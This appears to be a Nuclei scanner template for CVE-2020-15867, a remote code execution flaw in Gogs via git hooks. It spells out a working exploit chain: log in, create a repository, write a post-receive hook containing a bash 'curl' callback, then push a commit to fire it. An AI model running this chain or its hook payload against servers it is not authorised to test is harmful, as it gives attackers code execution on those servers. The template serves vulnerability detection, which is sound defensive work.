id: CVE-2020-15867 info: name: Gogs 0.5.5 - 0.12.2 - Remote Code Execution author: theamanrawat severity: high description: | Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue. reference: - https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/ - http://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2020-15867 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-15867 epss-score: 0.96555 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 7 verified: true vendor: gogs product: gogs tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive http: - raw: - | GET /user/login HTTP/1.1 Host: {{Hostname}} - | POST /user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}} - | GET /repo/create HTTP/1.1 Host: {{Hostname}} - | POST /repo/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on - | POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}} - | GET /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} - | POST /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct cookie-reuse: true matchers-condition: and matchers: - type: word part: interactsh_protocol words: - http - type: word part: body_1 words: - content="Gogs extractors: - type: regex name: csrf group: 1 regex: - name="_csrf" value="(.*)" internal: true - type: regex name: auth_csrf group: 1 regex: - name="_csrf" content="(.*)" internal: true - type: regex name: last_commit group: 1 regex: - name="last_commit" value="(.*)" internal: true